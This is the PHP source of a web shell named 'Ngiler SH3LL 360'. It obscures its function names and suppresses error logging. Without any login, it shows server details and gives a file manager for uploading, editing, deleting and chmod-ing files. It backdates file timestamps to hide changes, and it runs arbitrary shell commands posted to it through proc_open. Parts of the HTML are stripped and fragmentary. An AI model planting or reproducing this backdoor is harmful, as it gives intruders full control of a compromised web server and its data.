error_reporting(0);
$inst = 'ini_set';
@$inst('error_log', null);
@$inst('max_execution_time', 0);echo '<!doctypehtml><html lang="en"><meta charset="UTF-8"><meta content="width=device-width,initial-scale=1"name="viewport">#$@%#$%!<title>#$@%#$%!</title><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"rel="stylesheet"crossorigin="anonymous"integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="referrerpolicy="no-referrer"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://getbootstrap.com/docs/4.0/dist/css/bootstrap.min.css"><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href="https://fonts.googleapis.com/css2?family=Trade+Winds&display=swap" rel="stylesheet"><style> @import url("https://fonts.googleapis.com/css2?family=Trade+Winds");body { background-color: #212529; color: #fff; font-size: 16px;}table { width: 100%; border-collapse: collapse;}table, td, th { border: 2px solid #212529; font-size: 14px;}th { background-color: #000;}.fa { margin-right: 5px;}.fa-folder { color: #F29321;}a {text-decoration: none;color: #fff; }.silkscreen-regular { font-family: "Silkscreen", sans-serif; font-weight: 400; font-style: normal; font-size: 40px;}.silkscreen-bold { font-family: "Silkscreen", sans-serif; font-weight: 700; font-style: normal;}.button-container { display: flex; justify-content: center; flex-wrap: wrap; margin-bottom: 10px;}.modal { display: none; position: fixed; left: 0; top: 0; width: 100%; height: 100%; overflow: auto; background-color: rgb(0 0 0 / 57%);}.modal-content { background-color: #fefefe; margin: 5% auto; padding: 20px; border: 1px solid #04FBFF; max-width: 70%; box-shadow: 0 0 10px rgba(0, 0, 0, 0.3); background-color: #212529; border-radius: 10px solid #04FBFF;}.close { color: #aaa; float: right; font-size: 28px; font-weight: bold;}.close:hover,.close:focus { color: black; text-decoration: none; cursor: pointer;}.directory-listing-table { margin: auto; background-color: #212529; padding: .7rem 1rem; max-width: 900px; width: 100%;}textarea { max-width: 100%; max-height: 100%; padding-left: 2px; resize: none; overflow: auto; color: #fff; text-shadow: 1px 1px 1px rgba(0,0,0,0.3); border: 1px solid rgba(0,0,0,0.5); border-radius: 4px; box-shadow: inset 0 -1px 7px #34A9B8, 0 1px 1px rgba(255,255,255,0.2); -webkit-transition: box-shadow .5s ease; -moz-transition: box-shadow .5s ease; -o-transition: box-shadow .5s ease; -ms-transition: box-shadow .5s ease; transition: box-shadow .5s ease; background: rgba(0,0,0,0.3);} </style>';
$web = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on'? 'https': 'http') . '://'. $_SERVER['HTTP_HOST'];
$gser = 'get_current_user';
$enp = 'encodePath';
$isd = 'is_dir';
$stce = 'str_replace';
$isr = 'is_readable';
$dept = 'decodePath';
$pname = 'php_uname';
$pver = 'phpversion';
$isw = 'is_writable';
$cm = 'chmod';
$uren = 'urlencode';
$scd = 'scandir';
$flm = 'filemtime'; //pilewaktu
$fz = 'filesize'; //pileukuran
function formatSizeUnits($bytes){
$nf = 'number_format';
if($bytes>=1073741824){$bytes='<font color="aqua">'.$nf($bytes/1073741824,2).'</font> GB';}elseif($bytes>=1048576){$bytes='<font color="aqua">'.$nf($bytes/1048576,2).'</font> MB';}elseif($bytes>=1024){ $bytes='<font color="orange">'.$nf($bytes/1024,3).'</font> KB';}elseif($bytes>1){
$bytes='<font color="orange">'.$bytes.'</font> B';}elseif($bytes==1){
$bytes='<font color="orange">'.$bytes.'</font> B';}else{
$bytes='<font color="red">0</font> B';}return $bytes;
}function fileExtension($file) {
$sub = 'substr';
$sthr = 'strrchr';
return $sub($sthr($file,'.'),1);
}function fileIcon($file) {$stl = 'strtolower';$fe = 'fileExtension';$imgs = array('apng', 'avif', 'gif', 'jpg', 'jpeg', 'jfif', 'pjpeg', 'pjp', 'png', 'svg', 'webp', 'ico');$audio = array('wav', 'm4a', 'm4b', 'mp3', 'ogg', 'webm', 'mpc');$ext=$stl($fe($file));if($file=='error_log') {return '<i class="fa-sharp fa-solid fa-bug"></i> ';}elseif($file=='.htaccess') {return '<i class="fa-solid fa-hammer"></i> ';}if($ext=='html'||$ext=='htm') {return '<i class="fa-brands fa-html5"></i> ';}elseif($ext=='php'||$ext=='phtml') {return '<i class="fa-brands fa-php"></i> ';}elseif(in_array($ext,$imgs)) {return '<i class="fa-regular fa-images"></i> ';}elseif($ext=='zip'){return '<i class="fa-solid fa-file-archive"></i> ';}elseif($ext=='css'){return '<i class="fa-brands fa-css3"></i> ';}elseif($ext=='txt'){return '<i class="fa fa-file-text"></i> ';}elseif(in_array($ext,$audio)) {return '<i class="fa-solid fa-music"></i> ';}elseif($ext=='py'){return '<i class="fa-brands fa-python"></i> ';}elseif($ext=='js'){return '<i class="fa-brands fa-js"></i> ';}elseif($ext=='mp4'){return '<i class="fa fa-file-video"></i> ';}else{return '<i class="fa-solid fa-file"></i> ';}
} function encodePath($path) {$stce = 'str_replace';$a = array('/', '\\', '.', ':');$b = array(net('ক'),net('খ'),net('গ'),net('ঘ'));return $stce($a,$b,$path);
} function decodePath($path) {$stce = 'str_replace';$a = array('/', '\\', '.', ':');$b = array(net('ক'),net('খ'),net('গ'),net('ঘ'));
return $stce($b,$a,$path);
} function net($hexnet) {$slen = 'strlen';$dhx = 'dechex';$or = 'ord'; for ($i = 0; $i < $slen($hexnet); $i++) {$d7net .= $dhx($or($hexnet[$i]));}return $d7net;
} function ipserv() {$ghb = 'gethostbyname';if (empty($_SERVER['SERVER_ADDR'])) {return $ghb($_SERVER['SERVER_NAME']);if (empty($ghb($_SERVER['SERVER_NAME']))) {return $_SERVER['SERVER_NAME'];}} else {return $_SERVER['SERVER_ADDR'];}}
echo '<div style=\'margin-bottom: 0px; margin-left: 0px;\'>';
echo '</div>';
echo '
';
$rutpat=__DIR__;
if(isset($_GET['p'])){
if(empty($_GET['p'])){
$p=$rutpat;
}elseif(!$isd($dept($_GET['p']))){
echo '<script>alert(\'Directory is Corrupted and Unreadable.\');window.location.replace(\'?\');</script>';
}elseif($isd($dept($_GET['p']))){
$p=$dept($_GET['p']);
}
}elseif(isset($_GET['q'])){
if(!$isd($dept($_GET['q']))){
echo '<script>window.location.replace(\'?p=\');</script>';
}elseif($isd($dept($_GET['q']))){
$p=$dept($_GET['q']);
}
}else{
$p=$rutpat;
}
define('PATH',$p);
if(isset($_GET['p'])){
if($isr(PATH)){
$fetch_obj=$scd(PATH);
$folders=array();
$files=array();
foreach($fetch_obj as $obj){
if($obj=='.'||$obj=='..'){
continue;
}
$new_obj=PATH.'/'.$obj;
if($isd($new_obj)){
array_push($folders,$obj);
}elseif(is_file($new_obj)){
array_push($files,$obj);
}
}
}
// mnu
echo '<table class=\'table table-dark\' style=\'width:70%;box-shadow: 0 0 5px #0D97A5\' align=\'center\'><thead style=\'--bs-table-bg:#0D97A5;--bs-table-color:#000;\'><th><div style=\'font-family:Trade Winds;font-size:24px;color:#000;\' align=\'center\'><i class=\'fa-brands fa-napster\'></i> <a href=\''. $_SERVER['SCRIPT_NAME'] . '\'>Ngiler SH3LL 360</a></div></th>
</thead>';
echo '<button onclick=location.href=\''. $_SERVER['SCRIPT_NAME'] . '\' class=\'btn btn-outline-light\'><i class=\'fas fa-home\'></i> Home</button> ';
echo '<button id="Information" class="btn btn-outline-light"><i class="fa fa-info-circle"></i>Information</button> ';
echo '<button onclick=location.href=\'?p='. $uren($enp(PATH)) . '&opet='. net('createfile') . '\' class=\'btn btn-outline-light\'><i class=\'fa-solid fa-file-circle-plus\'></i> Create File</button> ';
echo '<button onclick=location.href=\'?p='. $uren($enp(PATH)) . '&opet='. net('buatdir') . '\' class=\'btn btn-outline-light\'><i class=\'fa-solid fa-folder-plus\'></i> Create Folder</button>';
echo '<hr color=\'white\'>Dir : ';
$exp = 'explode';
$path=$stce('\\','/',PATH);
$paths=$exp('/',$path);
foreach($paths as $id=>$dir_part){
if($dir_part==''&&$id==0){
$a=true;
echo '<a href="?p=/"></i> : /</a>';continue;
}if($dir_part=='')continue;
echo '<a href=\'?p=';for($i=0;$i<=$id;$i++){
echo $stce(':',net('ঘ'),$paths[$i]);
if($i!=$id) echo net('ক');
}
echo '\' style=\'font-size:14px; color: white; text-decoration: none;\'>'. $dir_part . '</a> / ';
} echo ' | ';
echo '<table class="table table-dark" style="width:70%;box-shadow: 0 0 5px #0D97A5" align="center"> | ';
if(isset($_POST['uplod'])){
$filez = PATH . '/'. $_FILES['fileToUpload']['name'];
$bsn = 'basename';
$mvup = 'move_uploaded_file';
if($mvup($_FILES['fileToUpload']['tmp_name'],$filez)){
echo '<table class=\'table table-dark\' style=\'width:30%;box-shadow: 0 0 5px #0D97A5;\' align=\'center\'> <thead style=\'--bs-table-bg:#0D97A5;--bs-table-color:#000;\'> <th><font color=\'lime\'>Successfully.</font></th>
</thead> '. $bsn($filez) . ' has been uploaded. | ';
}else{
echo '<table class=\'table table-dark\' style=\'width:30%;box-shadow: 0 0 5px #0D97A5;\' align=\'center\'> <thead style=\'--bs-table-bg:#0D97A5;--bs-table-color:#000;\'> <th><font color=\'#F82706\'>FAILLED.</font></th>
</thead> Sorry, there was an error uploading your file. | ';
}exit();
}
if(isset($_POST['submit'])) {
ekse($_POST['koman'], PATH);
}
echo '<div id="myModal" class="modal"> <div class="modal-content"> <table class="table table-dark" style="width:100%;"><thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"><th> Information Server</th>
</thead> <p><i class="fa-solid fa-network-wired" aria-hidden="true"></i> ip : <font color="#0D97A5">'. ipserv() . '</font></p> <p><i class="fa-solid fa-computer" aria-hidden="true"></i> System : <font color="#0D97A5">'. $pname() . '</font></p> <p><i class="fa-solid fa-user" aria-hidden="true"></i> User : <font color="#0D97A5">'. @$gser() . '</font></p> <p><i class="fa-brands fa-php" aria-hidden="true"></i> PHP Version : <font color="#0D97A5">'. @$pver() . '</font></p> <p><i class="fa-solid fa-server" aria-hidden="true"></i> Software : <font color="#0D97A5">'. $_SERVER['SERVER_SOFTWARE'] . '</font></p> | <span class="close btn btn-outline-light" style="width:200px;font-size:14px;float:right;">close</span> </div></div>';
if ($_REQUEST['opet'] == net('createfile')){
function cretf(){
$fpn = 'fopen';
$fwr = 'fwrite';
$pat = PATH;
$nama_file = $_POST['nama_file'];
$isi_file = $_POST['isi_file'];
$handle = $fpn("$pat/$nama_file", 'w');
$filez = $pat.'/'.$nama_file;
$stce = 'str_replace';
$asu = $stce($_SERVER['DOCUMENT_ROOT'], $web. '', $filez);
if ($fwr($handle, $isi_file)) {
echo '<table class="table table-dark table-sm" style="width:30%;box-shadow: 0 0 5px #0D97A5;" align="center"> <thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"> <th><font color="lime">Successfully!!</font></th>
</thead> Created => <font color="lime">'. $nama_file . ' </font>Link : <a href="'. $asu . '" target="_blank"><font color="aqua"><i>Click here</i></a></font> | ';
} else {
echo '<table class="table table-dark table-sm" style="width:30%;box-shadow: 0 0 5px #0D97A5;" align="center"> <thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"> <th>ERROR</th>
</thead> <font color=red> <i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Failed to create file.</font></script> | ';
}
} if(!isset($_POST['bikin'])) {
echo '<table class=\'table table-dark\' style=\'width:50%;box-shadow: 0 0 5px #0D97A5;\' align=\'center\'> <thead style=\'--bs-table-bg:#0D97A5;--bs-table-color:#000;\'> <th>Create File</th>
</thead> | ';
} else {
cretf();
}exit();
} elseif ($_GET['opet'] == net('buatdir')) {
echo '<table class="table table-dark" style="width:50%;box-shadow: 0 0 5px #0D97A5;" align="center"> <thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"> <th>Create Folder</th></thead> | | ';
if (isset($_POST['buat'])) {
$foladd = PATH.'/'.$_POST['add'];
$cref = 'mkdir';
$flex = 'file_exists';
if (!$flex($foladd)) {
if ($cref($foladd, 0755, true)) {
echo '<table class=\'table table-dark\' align=\'center\' style=\'width:40%;box-shadow: 0 0 5px #0D97A5;\'> <thead style=\'--bs-table-bg:#0D97A5;--bs-table-color:#000;\'>
<th><font color=\'lime\'>Successfully!!</font></th>
</thead> Folder <font color=\'orange\'>'. $_POST['add'] . '</font> berhasil dibuat. Url => <a href=\'?p='. $uren($enp(PATH)) . net('ক') . $_POST['add'] . '\'><i>Here</i></a> | ';
} else {
echo '<table class=\'table table-dark\' align=\'center\' style=\'width:40%;box-shadow: 0 0 5px #0D97A5;\'> <thead style=\'--bs-table-bg:#0D97A5;--bs-table-color:#000;\'><th> <font color=\'red\'>FAILED.</th>
</thead> <font color=\'red\'>Gagal membuat folder</font> <font color=\'orange\'>'. $_POST['add'] . '</font>. | ';
}
} else {
echo '<table class=\'table table-dark\' align=\'center\' style=\'width:40%;box-shadow: 0 0 5px #0D97A5;\'> <thead style=\'--bs-table-bg:#0D97A5;--bs-table-color:#000;\'><th>EMPTY</th>
</thead> Folder <font color=\'orange\'>'. $_POST['add'] . '</font> sudah ada. | ';
}
}exit();
}
//fm
echo '<table class="table table-dark table-hover" style="box-shadow: 0 0 5px #0D97A5;width:90%;border-left:1px solid #40BECC;border-right:1px solid #40BECC;border-bottom:1px solid #40BECC;--bs-border-radius:80rem;" align="center"> <thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"> <th>Name</th> <th>Size</th> <th>Last Modified</th> <th>Permissions</th> <th>Actions</th>
</thead> <tbody>';
foreach($folders as $folder){
echo ' | <i class=\'fa-solid fa-folder\'></i> <a href=\'?p='. $uren($enp(PATH . '/'. $folder)) . '\'>'. $folder . '</a> | --- | '. date('F d Y H:i:s', $flm(PATH . '/'. $folder)) . ' | ';
if($isw(PATH.'/'.$folder)) echo '<font color="lime">';
elseif(!$isr(PATH.'/'.$folder)) echo '<font color="red">';
echo d7netstat(PATH.'/'.$folder);
if($isw(PATH.'/'.$folder) || !$isr(PATH.'/'.$folder)) echo '</font>';
echo ' | <select class=\'custom-select custom-select-sm\' onchange=\'location = this.value;\'> <option selected>Select</option> <option value=\'?q='. $uren($enp(PATH)) . '&r='. $folder . '\'>Rename</option> <option value=\'?q='. $uren($enp(PATH)) . '&chdet='. $folder . '\'>Chdate</option> <option value=\'?q='. $uren($enp(PATH)) . '&cmod='. $folder . '\'>Chmod</option> <option value=\'?q='. $uren($enp(PATH)) . '&d='. $folder . '\'>Delete</option> </select> |
</div>';
}foreach($files as $file){
echo ' | '. fileIcon($file) . ' <a href=\'?q='. $uren($enp(PATH)) . '&e='. $file . '\'>'. $file . '</a> | '. formatSizeUnits($fz(PATH . '/'. $file)) . ' | '. date('F d Y H:i:s', $flm(PATH . '/'. $file)) . ' | ';
if($isw(PATH.'/'.$file)) echo '<font color="lime">';
elseif(!$isr(PATH.'/'.$file)) echo '<font color="red">';
echo d7netstat(PATH.'/'.$file);
if($isw(PATH.'/'.$file) || !$isr(PATH.'/'.$file)) echo '</font>';
echo ' | <select class=\'custom-select custom-select-sm\' onchange=\'location = this.value;\'> <option selected>Select</option> <option value=\'?q='. $uren($enp(PATH)) . '&e='. $file . '\'>Edit File</option> <option value=\'?q='. $uren($enp(PATH)) . '&r='. $file . '\'>Rename</option> <option value=\'?q='. $uren($enp(PATH)) . '&chdet='. $file . '\'>Chdate</option> <option value=\'?q='. $uren($enp(PATH)) . '&cmod='. $file . '\'>Chmod</option> <option value=\'?q='. $uren($enp(PATH)) . '&d='. $file . '\'>Delete</option> </select> |
';}echo ' <table class=\'table table-dark\' style=\'width:90%;box-shadow: 0 0 5px #0D97A5\' align=\'center\'><thead style=\'--bs-table-bg:#0D97A5;--bs-table-color:#000;\'><th>'.date('Y').' © Ngiler SH3LL | Created By D7net. <div style=\'float:right;x\'> <a href=\'https://github.com/bellpwn/opet\' class=\'btn btn-outline-light btn-sm\'><i class=\'fa-brands fa-github\'></i></a> <a href=\'http://opetolol.eu.org/\' class=\'btn btn-outline-light btn-sm\'><i class=\'fa-solid fa-globe\'></i></a> <a href=\'mailto:opeteveryday@gmail.com\' class=\'btn btn-outline-light btn-sm\'><i class=\'fa-solid fa-envelope\'></i></a></div></th>
</thead>'; }else{ if(empty($_GET)){
echo '<script>window.location.replace(\'?p=\');</script>';}}if(isset($_GET['upload'])){
echo ' ';
} if(isset($_GET['chdet'])) {
if(!empty($_GET['chdet']) && isset($_GET['q'])) {
$bsn = 'basename';
$filez = $bsn($_GET['chdet']);
$fdate = PATH.'/'.$filez;
$tgl = date('F d Y H:i:s',$flm($fdate));
echo '
<table class="table table-dark" style="width:40%;" align="center"> <thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"> <th>Change Date : '. $tgl . ' | Name : '. $filez . '</th>
</thead> |
';
if (isset($_POST['change'])) {
$stm = 'strtotime';
$toc = 'touch';
$tanggal = $stm($_POST['date']);
if (@$toc($fdate, $tanggal) == true) {
echo '<script>alert(\'Changed Successfully.\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
} else {
echo '<script>alert(\'Failed to Changed.\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
}
}
}
} if(isset($_GET['cmod'])) {
if(!empty($_GET['cmod']) && isset($_GET['q'])) {
$bsn = 'basename';
$files = $bsn($_GET['cmod']);
echo '
<table class=\'table table-dark\' style=\'width:40%;\' align=\'center\'><thead style=\'--bs-table-bg:#0D97A5;--bs-table-color:#000;\'><th> Change Permission : '. d7netstat(PATH . '/'. $files) . ', Name : '. $files . '</th>
</thead> | ';
if (isset($_POST['change'])) {
$cek = PATH.'/'.$files;
$odc = 'octdec';
$opet = @$cm($cek, $odc($_POST['chm0d']));
if ($opet == true) {
echo '<script>alert(\'Changed Successfully. '. d7netstat(PATH . '/'. $files) . ' => '. $_POST['chm0d'] . '\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
} else {
echo '<script>alert(\'Gagal Mengubah Permission :( .\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
}
}
}
} if(isset($_GET['r'])) {
if(!empty($_GET['r']) && isset($_GET['q'])) {
echo '
<table class="table table-dark" style="width:40%; box-shadow: 0 0 5px #0D97A5;" align="center"> <thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"> <th>Rename : <font color="white">'. $_GET['r'] . '</font></th>
</thead> | ';
if(isset($_POST['rename'])){
$name=PATH.'/'.$_GET['r'];
$rnme = 'rename';
if($rnme($name,PATH.'/'.$_POST['name'])){
echo '<script>alert(\'Berkas berhasil ganti nama.\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
}else{
echo '<script>alert(\'Some error occurred.\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
}
}
}
}if(isset($_GET['e'])){
if(!empty($_GET['e']) && isset($_GET['q'])){
$htsp = 'htmlspecialchars';
$fgc = 'file_get_contents';
echo ' <table class="table table-dark" style="width:80%; box-shadow: 0 0 5px #0D97A5;" align="center"> <thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"> <th> Edit File : <font color="lime">'. $_GET['e'] . '</font> | Size : '. formatSizeUnits($fz(PATH . '/'. $_GET['e'])) . '<button type="button" class="btn btn-outline-light btn-sm" onclick="myFunction()" style="float:right;"><i class="fa fa-copy"></i> Copy</button></th>
</thead> | ';
if (isset($_POST['edit'])) {
$fpn = 'fopen';
$fwr = 'fwrite';
$pilen = PATH . '/'. $_GET['e'];
$data = $_POST['data'];
$open = $fpn($pilen, 'w');
if ($fwr($open, $data)) {
echo '<script>alert(\'Berkas berhasil di simpan.\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
} else {
echo '<script>alert(\'Some error occurred.\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
} fclose($open);
}
}
} if(isset($_GET['d']) && isset($_GET['q'])) {
$name=PATH.'/'.$_GET['d'];
$uli = 'unlink';
$isf = 'is_file';
if($isf($name)){
if($uli($name)){
echo '<script>alert(\'File removed.\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
}else{
echo '<script>alert(\'Some error occurred.\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
}
}elseif($isd($name)){
$rd = 'rmdir';
if($rd($name)==true){
echo '<script>alert(\'Directory removed.\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
}else{
echo '<script>alert(\'Some error occurred.\'); window.location.replace(\'?p='. $enp(PATH) . '\');</script>';
}
}
}
function ekse($coman) {
$hch = 'htmlspecialchars';$sgc = 'stream_get_contents'; $ler = '2>&1'; $pm = 'preg_match'; if (!$pm('/'. $ler . '/i', $coman)) { $coman = $coman . ' '. $ler; } $komen = $coman; $pr = 'proc_open'; $fe = 'function_exists';if ($fe($pr)) { $tod = @$pr($komen, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'r')), $crottz, PATH); echo '<table class=\'table table-dark\' style=\'width:70%;box-shadow: 0 0 5px #0D97A5\' align=\'center\'> <thead style=\'--bs-table-bg:#0D97A5;--bs-table-color:#000;\'><th> Command : <font color=\'#fff\'>'. $_POST['koman'] . '</font></th>
</thead> <pre><textarea style=\'height:400px;width: 100%;color: lime;\' readonly> '. $hch($sgc($crottz[1])) . '</textarea></pre> |
'; } else { echo '<font color=\'orange\'>proc_open function is disabled!!</font>';
} die;
}
function d7netstat($file){
$sb = 'substr';$sp = 'sprintf';$fp = 'fileperms';
$izin = $sb($sp('%o', $fp($file)), -4);
return $izin;
}
<script>
function number(event) {
var angka = (event.which) ? event.which : event.keyCode
if (angka != 46 && angka > 31 && (angka < 48 || angka > 57))
return false;
return true;
}
function myFunction() {
var copyText = document.getElementById("myInput");
copyText.select();
copyText.setSelectionRange(0, 99999); // For mobile devices
navigator.clipboard.writeText(copyText.value);
alert("Copied Successfully!!");
}
var modal = document.getElementById("myModal");
var btn = document.getElementById("Information");
var span = document.getElementsByClassName("close")[0];
btn.onclick = function() {
modal.style.display = "block";
}
span.onclick = function() {
modal.style.display = "none";
}
window.onclick = function(event) {
if (event.target == modal) {
modal.style.display = "none";
}
}
</script>